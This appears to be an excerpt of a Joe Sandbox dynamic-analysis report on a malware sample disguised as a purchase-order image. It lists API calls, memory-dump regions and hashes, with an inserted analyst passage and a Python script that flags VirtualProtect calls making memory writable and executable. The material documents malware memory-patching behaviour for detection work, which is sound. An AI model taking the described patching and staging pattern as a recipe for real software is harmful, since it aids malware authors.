• Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: eded891075ee9d68bdfa7caca34f4ecd2b61e9434e1da65918f8acfe225afcc1
• Instruction ID: f02d1f32d416435064830634415e16150983832f9e15cf27d1a8645227483e3a
• Opcode Fuzzy Hash: eded891075ee9d68bdfa7caca34f4ecd2b61e9434e1da65918f8acfe225afcc1
• Instruction Fuzzy Hash: 6EE0E676250108BFD700DFA9DD47FD577ECE758745F008421B609D7095C774E5508B69
APIs
• WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403057,00000000,007890F8,000000FF,007890F8,000000FF,000000FF,00000004,00000000), ref: 00405A3A
Memory Dump Source
• Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
• Instruction ID: 202e9d0092b88ed1e300126467a6d0629c49e9ab1c26cc5f9aac99f6baf52130
• Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
• Instruction Fuzzy Hash: FFE0EC3261425AAFDF10AEA59C44EEB7B6CFB05360F008533F915E2550D231E921DFA9
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030A1,00000000,00000000,00402EEE,000000FF,00000004,00000000,00000000,00000000), ref: 00405A0B
Memory Dump Source
• Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
• Instruction ID: ec62d6923e01247a1983afaeae7cc56c043784b3a51a97a909eefe23b1c45cc9
• Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
• Instruction Fuzzy Hash: CFE04F32210259AFCF10AE549C40EAB375CEB04250F004432F915E2040D230E8119FA8
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2632503904.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000000.00000002.2632485014.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2632520015.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2632534659.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                      • Instruction ID: 4f82052a8ee677216feeb46ba648c84afb962adc58c95b92ee0d34447feb5494
                                                                      • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                      • Instruction Fuzzy Hash: B5F09BF19092A0DEF360DF688CC4B063FE4E3983D5B03892AE358F6269EB7441448B19
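                                                                      The VirtualProtect record above is the one an analyst should stop at: the call at ref 10002729 sets 4 bytes at 1000404C to protection 00000040, which is PAGE_EXECUTE_READWRITE, and the dump list for the same module shows the region starting at 10003000 with protection 00000002 (PAGE_READONLY), so a read-only data slot is being made writable and executable. The script below is an added example, not part of the Joe Sandbox report: it parses the report's "APIs" lines and the .sdmp dump-file names, decodes the protection constants, and reports every VirtualProtect call that grants write+execute together with the prior protection of the region that owns the target address. The interpretation of the dot-separated .sdmp name fields (4th field = region base, 5th = page protection) is an assumption inferred from the values on this page, and, since the names carry no size, a region is assumed to extend to the next listed base. The sample input is copied from the record above.

```python
"""Decode VirtualProtect protections in Joe Sandbox "APIs" lines and map the
target address to the "Memory Dump Source" regions. Added example; not part of
the Joe Sandbox report."""
import re
from typing import Dict, List, Optional

# Win32 page protection constants (winnt.h).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
WRITE_EXEC = 0x40 | 0x80  # protections that are both writable and executable

# e.g. "• VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729"
API_RE = re.compile(
    r"^\W*(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
# e.g. "00000000.00000002.2632503904.0000000010001000.00000020.00000001.01000000.00000004.sdmp"
# ASSUMPTION: field 4 is the region base, field 5 its page protection (0x20 for the
# code regions on the page, 0x02 / 0x04 for the data regions).
DUMP_RE = re.compile(
    r"(?P<proc>[0-9A-F]{8})\.(?P<kind>[0-9A-F]{8})\.(?P<uid>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})\.(?P<state>[0-9A-F]{8})\."
    r"(?P<type>[0-9A-F]{8})\.(?P<mod>[0-9A-F]{8})\.sdmp", re.I)


def decode_protect(value: int) -> str:
    """Render a protection DWORD as its winnt.h names, modifiers included."""
    base = PAGE_PROTECT.get(value & 0xFF, f"UNKNOWN(0x{value & 0xFF:X})")
    mods = [name for bit, name in PAGE_MODIFIERS.items() if value & bit]
    return "|".join([base] + mods)


def _arg(token: str) -> Optional[int]:
    token = token.strip()
    if token in ("", "?"):  # Joe Sandbox prints '?' for stack slots it could not resolve
        return None
    sign = -1 if token.startswith("-") else 1
    return sign * int(token.lstrip("-"), 16)


def parse_api_line(line: str) -> Optional[Dict]:
    m = API_RE.match(line)
    if not m:
        return None
    return {"api": m["api"], "module": m["mod"], "ref": int(m["ref"], 16),
            "args": [_arg(a) for a in m["args"].split(",")]}


def parse_dump_name(name: str) -> Optional[Dict]:
    m = DUMP_RE.search(name)
    if not m:
        return None
    return {"base": int(m["base"], 16), "protect": int(m["prot"], 16),
            "module": int(m["mod"], 16), "process": int(m["proc"], 16)}


def region_for(addr: int, regions: List[Dict]) -> Optional[Dict]:
    """Owner of addr: the highest listed base that is <= addr (sizes are not given)."""
    owner = None
    for region in sorted(regions, key=lambda r: r["base"]):
        if region["base"] <= addr:
            owner = region
    return owner


def find_rwx_virtualprotect(api_lines: List[str], dump_names: List[str]) -> List[Dict]:
    """Report VirtualProtect calls that grant write+execute, with the region's prior protection."""
    regions = [d for d in (parse_dump_name(n) for n in dump_names) if d]
    findings = []
    for call in (parse_api_line(line) for line in api_lines):
        if not call or call["api"] != "VirtualProtect" or len(call["args"]) < 3:
            continue
        addr, size, prot = call["args"][:3]
        if prot is None or not prot & WRITE_EXEC:
            continue
        owner = region_for(addr, regions) if addr is not None else None
        findings.append({
            "ref": call["ref"], "address": addr, "size": size,
            "new_protect": decode_protect(prot),
            "region_base": owner["base"] if owner else None,
            "region_protect": decode_protect(owner["protect"]) if owner else None,
        })
    return findings


# Constructed input: the two KERNELBASE lines and the dump names from this module's records.
SAMPLE_APIS = [
    "• VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729",
    "• GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D",
]
SAMPLE_DUMPS = [
    "00000000.00000002.2632503904.0000000010001000.00000020.00000001.01000000.00000004.sdmp",
    "00000000.00000002.2632485014.0000000010000000.00000002.00000001.01000000.00000004.sdmp",
    "00000000.00000002.2632520015.0000000010003000.00000002.00000001.01000000.00000004.sdmp",
    "00000000.00000002.2632534659.0000000010005000.00000002.00000001.01000000.00000004.sdmp",
]

if __name__ == "__main__":
    for f in find_rwx_virtualprotect(SAMPLE_APIS, SAMPLE_DUMPS):
        print(f"ref {f['ref']:08X}: {f['size']} byte(s) at {f['address']:08X} -> {f['new_protect']}; "
              f"owning region {f['region_base']:08X} was {f['region_protect']}")
```

                                                                      Run against the full report, the same parser flags any other write+execute transition and lets you check whether the affected region is image-backed (type field 01000000 in these names) or a fresh allocation such as the GlobalAlloc(00000040) result in the record further down, which is the usual distinction between patching a loaded module and staging a separate payload buffer.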
                                                                      APIs
                                                                      • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022FA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfileString
                                                                      • String ID:
                                                                      • API String ID: 1096422788-0
                                                                      • Opcode ID: 89032baceb3f6f114b0488ce247a90a0ba58f85f764d13967e355b5ac32f42df
                                                                      • Instruction ID: 39f1f9859769fa242ff58571ca275c021542d1dfaf63d46caa25723865460d27
                                                                      • Opcode Fuzzy Hash: 89032baceb3f6f114b0488ce247a90a0ba58f85f764d13967e355b5ac32f42df
                                                                      • Instruction Fuzzy Hash: 66E08630A04214BFDB20EFA08D09BAE3669BF11714F10403AF9917B0D2EAB849419B1D
                                                                      APIs
                                                                      • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 0ea397a8211670639f436dd097bf0c7cb6117b14819b8f8d67c2300def58ed07
                                                                      • Instruction ID: 839d6edb89fd0a39869f3bdff0d3b393134e6f043e5016f1e00bd5f534211bce
                                                                      • Opcode Fuzzy Hash: 0ea397a8211670639f436dd097bf0c7cb6117b14819b8f8d67c2300def58ed07
                                                                      • Instruction Fuzzy Hash: 34D05B33B14110DBDB40EBE4DB08A9D73A5BB60329B308637D201F21D1D7BDC9549B29
                                                                      APIs
                                                                      • SendMessageA.USER32(00010426,00000000,00000000,00000000), ref: 00403F4F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: fe9c5fbe97cae241cde84ce22785a5e9dbc0b02d0b9d793388d9d8a90b417260
                                                                      • Instruction ID: 9b9c13dac3056517ae90cab9ba0900707a7cdbddb9b58ac83e38e750941f619c
                                                                      • Opcode Fuzzy Hash: fe9c5fbe97cae241cde84ce22785a5e9dbc0b02d0b9d793388d9d8a90b417260
                                                                      • Instruction Fuzzy Hash: 39C04C71A442016AEB219B649D49F067BA8A751701F1594257315A50E0D674E410D66D
                                                                      APIs
                                                                      • SendMessageA.USER32(00000028,?,00000001,00403D57), ref: 00403F34
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: c60a5741adf6fd17905679b15365177ec5dfd851c523a537735145c0d793b3ca
                                                                      • Instruction ID: bce073d95cda9f80ae5a70f3258e8641f0ad27ed80faf677ac8523eeabb20274
                                                                      • Opcode Fuzzy Hash: c60a5741adf6fd17905679b15365177ec5dfd851c523a537735145c0d793b3ca
                                                                      • Instruction Fuzzy Hash: F7B09235585200AAEA224B40DD09F457A62A7A4701F008064B210240F0CAB200A0DB19
                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,000089E4), ref: 004030B2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer
                                                                      • String ID:
                                                                      • API String ID: 973152223-0
                                                                      • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                      • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                      • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                      • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                      APIs
                                                                      • KiUserCallbackDispatcher.NTDLL(?,00403CF0), ref: 00403F1D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: CallbackDispatcherUser
                                                                      • String ID:
                                                                      • API String ID: 2492992576-0
                                                                      • Opcode ID: 0fd0461592f2d81c1c03ce05c628ae056ab63dad8406c1f23e4af249cfc5fe4d
                                                                      • Instruction ID: 7c635d8461ea366e4ce50998120561f43c0f0a4d26a99d582f7a8baadb7aa675
                                                                      • Opcode Fuzzy Hash: 0fd0461592f2d81c1c03ce05c628ae056ab63dad8406c1f23e4af249cfc5fe4d
                                                                      • Instruction Fuzzy Hash: 98A00176808101EBCB029B50FE08D4ABF62ABA4709B12D426E25594174D6365871FF2A
                                                                      APIs
                                                                      • Sleep.KERNELBASE(00000000), ref: 004014E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 6ef222803d68d34d2b98f7333693f5778702576746e8508d9016a81179eb72e8
                                                                      • Instruction ID: 792a8355e77204e71b52dac9cb8dd8af6eaf68ea71b947aa0f734c6da66c5308
                                                                      • Opcode Fuzzy Hash: 6ef222803d68d34d2b98f7333693f5778702576746e8508d9016a81179eb72e8
                                                                      • Instruction Fuzzy Hash: 9AD0C777B145404BD750E7B87E8545A6399F7513253204D33D502F1091D678C9059A29
                                                                      APIs
                                                                      • GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2632503904.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000000.00000002.2632485014.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000000.00000002.2632520015.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000000.00000002.2632534659.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: AllocGlobal
                                                                      • String ID:
                                                                      • API String ID: 3761449716-0
                                                                      • Opcode ID: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                                                      • Instruction ID: 35b308b173d9b0532f6cde55f5bface33093279d7ce3c78a2cc6db588f634b90
                                                                      • Opcode Fuzzy Hash: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                                                      • Instruction Fuzzy Hash: 6CA002B1945620DBFE429BE08D9EF1B3B25E748781F01C040E315641BCCA754010DF39
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003F9), ref: 004048BA
                                                                      • GetDlgItem.USER32(?,00000408), ref: 004048C5
                                                                      • GlobalAlloc.KERNEL32(00000040,00000001), ref: 0040490F
                                                                      • LoadBitmapA.USER32(0000006E), ref: 00404922
